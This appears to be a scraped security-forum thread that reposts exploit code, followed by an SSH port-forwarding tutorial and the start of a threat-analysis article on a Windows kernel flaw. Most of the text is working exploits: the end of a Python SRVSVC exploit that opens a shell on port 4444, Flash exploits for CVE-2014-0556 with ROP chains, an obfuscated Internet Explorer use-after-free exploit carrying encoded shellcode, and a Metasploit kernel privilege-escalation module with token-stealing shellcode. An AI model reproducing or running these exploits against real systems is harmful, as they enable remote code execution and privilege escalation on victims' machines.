self.__dce.call(0x1f, self.__stub) print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.' if __name__ == '__main__': target = sys.argv[1] print '\nUsage: %s <target ip> \n' % sys.argv[0] sys.exit(-1) current = SRVSVC_Exploit(target) current.start() Nota: Syntax highlight asta jegos pune de-am-pulea niste spatii. Luati de la sursa. Sursa: [Python] CVE-2012-0002 - Pastebin.com

[h=1]CVE-2014-0556[/h]By: hdarwin on Sep 27th, 2014 (edited) By: [URL="http://pastebin.com/u/hdarwin"]hdarwin[/URL] on Sep 27th, 2014 (edited) [LIST=1]/* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0908a008 ebx=02ffa6a0 ecx=0b51f020 edx=4141411c esi=06a62020 edi=06a62020 eip=4141411c esp=02ffa5e4 ebp=02ffa610 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 4141411c ?? ??? */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.system.Capabilities; import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & " + Capabilities.version) private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0; ; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if ( ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15] ) { vector = ob[i1][0xFFFFFFFF - i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break }else if ( ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15] ) { vector = ob[i1][i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { str += "\n\nDump Vector<Object>" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(ob[i0][i2 + i3 - 9].toString(16), 8) + "\t" } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } str += "\n\n*** V-Table Modify ***" write(ob[i0][i2 + 1] - 1, vector + 8) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } ============================================================================================================================= /* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* (1728.eb0): Break instruction exception - code 80000003 (first chance) eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63048 cc int 3 1:020> dd esp l4 08d63048 cccccccc cccccccc cccccccc cccccccc 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63049 cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304a cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304b cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304c cc int 3 */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145") private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint private var vtable:uint private var flash:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0; ; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) { vector = ob[i1][0xFFFFFFFF - i2 + 11] break } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) { vector = ob[i1][i2 + 11] break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { vtable = read(ob[i0][i2 + 1] - 1) flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx write(ob[i0][i2 + 1] - 1, vector + 0xf54) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN ob[i0][3] = 0x00000201 // 0x00000201 ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN ob[i0][5] = 0x00000040 // 0x00000040 ob[i0][6] = flash + 0x00691119 // POP ECX # RETN ob[i0][7] = vector + 2000 // Writable location ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP) ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN ob[i0][11] = flash + 0x0000d83f // JMP [EAX] ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect() ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp' ob[i0][16] = 0xcccccccc // shellcode ob[i0][17] = 0xcccccccc // shellcode ob[i0][18] = 0xcccccccc // shellcode ob[i0][19] = 0xcccccccc // shellcode ob[i0][979] = flash + 0x0029913A // POP EAX # RETN ob[i0][980] = 0x00000f58 ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 str += flash.toString(16) var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } [/LIST] Sursa: [ActionScript 3] CVE-2014-0556 - Pastebin.com

MSIE Use After Free EXP/CVE-2013-1347 [URL="http://pastebin.com/JN2GiB8n#"][img=http://pastebin.com/i/t.gif][/URL] [LIST=1] <!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> <script> pRESSURA = eval('unescape'); fAHPARIC = CollectGarbage; dISCESA = '%u'; function rIGUARDI(rEPLACEMENT) { return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4)); } function vILMENTE(tRIPARTITO) { rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10)); if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI; mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10)); if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI; tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10)); if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE; pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10)); if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO; return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO; } function ue(dw) { return rIGUARDI(vILMENTE(dw)); } function setc() { var Then = new Date() Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3) document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString() } function readc() { var cookieString = new String(document.cookie); if (cookieString.indexOf("fucktheothers") == -1) { return 0 } else { return 1; } } function DropPayload() { // en = 77c10000 // kr = 77bc0000 // offset = 50000 var r = ""; r+= ue( 0x77bd4cfa ); // # POP EBP # RETN [msvcrt.dll] r+= ue( 0x77bd4cfa ); // # skip 4 bytes [msvcrt.dll] r += ue( 0x77BFFA1C); // # POP EBX # RETN [msvcrt.dll] r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201) for(i=0;i<=0x201;i++) { r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll] } r+= ue( 0x77be4de1 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x2cfe04a7 ); // # put delta into eax (-> put += 0x00000040 into edx) r+= ue( 0x77bfeb80 ); // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] r+= ue( 0x77c08fbc ); // # XCHG EAX,EDX # RETN [msvcrt.dll] r+= ue( 0x77bde33f ); // # POP ECX # RETN [msvcrt.dll] r+= ue( 0x77c0e062 ); // # &Writable location [msvcrt.dll] r+= ue( 0x77bf6116 ); // # POP EDI # RETN [msvcrt.dll] r+= ue( 0x77bf7a42 ); // # RETN (ROP NOP) [msvcrt.dll] r+= ue( 0x77beb8ba ); // # POP ESI # RETN [msvcrt.dll] r+= ue( 0x77bdaacc ); // # JMP [EAX] [msvcrt.dll] r+= ue( 0x77beb860 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x77bc1120 ); // # ptr to &VirtualProtect() [IAT msvcrt.dll] r+= ue( 0x77d03ad9); // # PUSHAD # RETN [user32.dll] r+= ue( 0x77c01025 ); // # ptr to 'push esp # ret ' [msvcrt.dll] return r; } function align_esp() { var r= ""; r += ue(0x77BFD801); return r; } function xchg_esp() { var r=""; r += ue(0x77BC5ED5); return r; } function helloWorld() { if (readc()) return; setc(); unicorn = unescape("ABCD"); unicorn2 = unescape("EEEE"); for (i=0; i < 2; i++) { unicorn += unescape("ABCD"); }unicorn += unescape("AB"); unicorn += DropPayload(); unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919"; animvalues = align_esp(); for (i=0; i < 0x70/4; i++) { if (i == 0x70/4-1) { animvalues += xchg_esp(); } else { animvalues += align_esp(); } } animvalues += unicorn; for(i = 0; i < 13; i++) { animvalues += ";red"; } f0 = document.createElement('span'); document.body.appendChild(f0); f1 = document.createElement('span'); document.body.appendChild(f1); f2 = document.createElement('span'); document.body.appendChild(f2); document.body.contentEditable="true"; f2.appendChild(document.createElement('datalist')); f1.appendChild(document.createElement('span')); f1.appendChild(document.createElement('table')); try{ f0.offsetParent=null; }catch(e) { }f2.innerHTML=""; f0.appendChild(document.createElement('hr')); f1.innerHTML=""; fAHPARIC(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld());"> <t:ANIMATECOLOR id="myanim"/> </body> </html> @PhysicalDrive0 [/LIST] Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com

[h=1]Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation', 'Description' => %q{ A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC 'Jay Smith <jsmith[at]korelogic.com>' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ ['Windows XP SP3', { 'HaliQuerySystemInfo' => 0x16bba, '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ] ], 'References' => [ [ 'CVE', '2014-4971' ], [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ], [ 'OSVDB', '109387' ] ], 'DisclosureDate' => 'Jul 18 2014', 'DefaultTarget' => 0 )) end def ring0_shellcode tokenswap = "\x60\x64\xA1\x24\x01\x00\x00" tokenswap << "\x8B\x40\x44\x50\xBB\x04" tokenswap << "\x00\x00\x00\x8B\x80\x88" tokenswap << "\x00\x00\x00\x2D\x88" tokenswap << "\x00\x00\x00\x39\x98\x84" tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8" tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB" tokenswap << [session.sys.process.getpid].pack('V') tokenswap << "\x8B\x80\x88\x00\x00\x00" tokenswap << "\x2D\x88\x00\x00\x00" tokenswap << "\x39\x98\x84\x00\x00\x00" tokenswap << "\x75\xED\x89\xB8\xC8" tokenswap << "\x00\x00\x00\x61\xC3" end def fill_memory(proc, address, length, content) session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE") unless proc.memory.writable?(address) vprint_error("Failed to allocate memory") return nil end vprint_good("#{address} is now writable") result = proc.memory.write(address, content) if result.nil? vprint_error("Failed to write contents to memory") return nil end vprint_good("Contents successfully written to 0x#{address.to_s(16)}") return address end def disclose_addresses(t) addresses = {} hal_dispatch_table = find_haldispatchtable return nil if hal_dispatch_table.nil? addresses['halDispatchTable'] = hal_dispatch_table vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}") vprint_status('Getting the hal.dll base address...') hal_info = find_sys_base('hal.dll') if hal_info.nil? vprint_error('Failed to disclose hal.dll base address') return nil end hal_base = hal_info[0] vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}") hali_query_system_information = hal_base + t['HaliQuerySystemInfo'] addresses['HaliQuerySystemInfo'] = hali_query_system_information vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}") addresses end def check if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end os = sysinfo["OS"] return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') return Exploit::CheckCode::Safe unless handle session.railgun.kernel32.CloseHandle(handle) return Exploit::CheckCode::Vulnerable end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device") end my_target = targets[0] print_status("Disclosing the HalDispatchTable address...") @addresses["halDispatchTable"] + 0x4, 0) session.railgun.kernel32.CloseHandle(handle) print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...") session.railgun.ntdll.NtQueryIntervalProfile(2, 4) print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The privilege escalation wasn't successful") end print_good("Privilege escalation successful!") p = payload.encoded print_status("Injecting #{p.length} bytes to memory and executing it...") unless execute_shellcode(p) fail_with(Failure::Unknown, "Error while executing the payload") end end end Sursa: http://www.exploit-db.com/exploits/34982/

SSH tunnel [TABLE=class: toc] [TR] [TD]Contents 1 simple port forwarding (SSH tunneling) 1.1 port forwarding through an intermediary 1.2 reverse port forwarding 1.3 tricky reverse forwarding 1.4 Using scp through a DMZ gateway to a machine behind a firewall using a tunnel [*]2 Other options [*]3 SOCKS5 with Firefox [/TD] [/TR] [/TABLE] simple port forwarding (SSH tunneling) This example creates a tunnel for HTTP. This will forward port 80 of your localhost to port 80 of Example Domain. ssh -f -N -q -L 80:localhost:80 username@www.example.com This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on imap.example.com. ssh -f -N -q -L 1143:localhost:143 username@imap.example.com -f tells ssh to go into the background (daemonize). -N tells ssh that you don't want to run a remote command. That is, you only want to forward ports. -q tells ssh to be quiet -L specifies the port forwarding port forwarding through an intermediary You can have the remote machine forward ports to a third machine. This is useful where your have your local machine outside a firewall; a visible machine on the DMZ; and a third machine invisible to the outside. This creates a tunnel from your localhost port 81 to 192.168.1.69 port 80 through dmz.example.com. This lets you see the web server from outside a LAN. ssh -f -N -q -L 81:192.168.1.69:80 username@dmz.example.com This example creates a tunnel for SSH itself, over localhost port 2222. ssh -f -N -q -L 2222:target-host.example.com:22 username@dmz.example.com This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on 192.168.1.100 through dmz.example.com. ssh -f -N -q -L 1143:192.168.1.100:143 username@dmz.example.com VNC Viewer uses port 5900. This shows a double-hop. # localhost --> wan-gateway --> dmz-gateway --> vnc-console ssh -L 5900:localhost:5900 root@wan-gateway.example.com ssh -L 5900:vnc-console.example.com:5900 root@dmz-gateway.example.com reverse port forwarding This is used in the following situation: You have a server inside a private LAN that you want to connect to from the WAN outside. You can't create a NAT and port forwarding on your firewall to map the machine to the outside. You have a server outside that you can connect to from the server inside the LAN. What this does is creates a connection from the server in the LAN to the server outside. Once that connection is established the server outside starts listening on port 2222. All connections to port 2222 are sent back to port 22 of the server in the LAN. Now you can leave this connection running in your office; go home and ssh to your proxy server at port 2222 and you will be connecting to your server inside the LAN on port 22. ssh -f -N -q -R 2222:localhost:22 my_name@remote.example.com tricky reverse forwarding This allows a server on an internal LAN expose a service to the outside WAN. For example, I have a database server that will only accept connections from a specific development box. That dev box is inside the firewall. I want to connect to the database from outside the firewall. ssh -t -L 5432:localhost:1999 my_name@firewall.example.com ssh -t db_server ssh -t -R 1999:127.0.0.1:5432 my_name@firewall Using scp through a DMZ gateway to a machine behind a firewall using a tunnel First you setup port forwarding through an intermediary. This forwards your localhost port 2222 to port 22 on 192.168.1.100. Remember, that 192.168.1.100 is not on your local network; 192.168.1.100 is on the LAN network shared with 208.77.188.166. ssh -f -N -q -L 2222:192.168.1.100:22 user@208.77.188.166 scp -P 2222 transformers.avi user@localhost:. A diagram might help. Remember, port 22 is the SSH server port on the 192.168.1.100 machine. +---------------+ +----------------+ +----------------------+ | your | | remote DMZ | | server on remote LAN | | local machine | | server | | 192.168.1.100 | | | | 208.77.188.166 | | | | 2222: >-------| |-------> :22 | | | |\______________/| | | | | | | | | +---------------+ +----------------+ +----------------------+ Other options -o ExitOnForwardFailure=yes \ -o GSSAPIAuthentication=no \ -o GSSAPIAuthentication=no \ -o HashKnownHosts=no \ -o KbdInteractiveAuthentication=no \ -o PermitLocalCommand=yes \ -o LocalCommand="logger connected to %h" \ -o LocalForward=00:remote.example.com:000 \ -o ExitOnForwardFailure=yes \ -o NoHostAuthenticationForLocalhost=yes \ -o ProxyCommand=foo \ -o RemoteForward=foo \ -o RequestTTY=yes \ -o SendEnv=LC_* \ -o Tunnel=ethernet \ -o TunnelDevice=any:any \ -o VerifyHostKeyDNS=yes SOCKS5 with Firefox Simple and secure web browsing. You can setup a tunnel as described above or you can use the following technique. This starts SSH on your localhost acting as a SOCKS proxy. Once you start SSH this way you can point any application that supports a SOCKS5 interface to this port. But these instructions will show what you need to do to get Firefox to proxy through SOCKS. Firefox supports SOCKS with no extra add-ons. Start ssh an connection to a host that you want to proxy through. Use the -D option to specify a SOCKS5 port on your localhost. The port doesn't really matter. You just need to use the same port in your SOCKS client application. ssh -D 9999 username@proxy.example.com In Firefox select "Edit | Preferences | Advanced Tab | Connection Settings button". Then select "Manual proxy configuration". All you need to fill out is "SOCKS Host: Localhost", "Port: 9999", then select "SOCKS v5". It's easy. This tool can also help in switching the proxy settings on and off: SwitchProxy Tool Sursa: SSH tunnel - Noah.org

Sau iti iei un mar: Sistem Desktop PC Mac mini cu procesor Intel® Core™ i7 2.30GHz, 4GB, 2TB, Intel® HD Graphics, OS X Server, RO - eMAG.ro

An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) 6:35 pm (UTC-7) | by Weimin Wu (Threat Analyst) Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited. This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target hit SCADA systems. The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) leveraged vulnerabilities in the Windows kernel (Win32k.sys), affecting most Windows versions. In 2013, only one Windows kernel zero-day, was made public; this particular vulnerability only affected some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are possibly shifting their focus back to kernel vulnerabilities. CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions. With a parameter in the command line, the exploit code can create new processes with System privileges of an assigned program. EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges needed by attackers. This was seen in 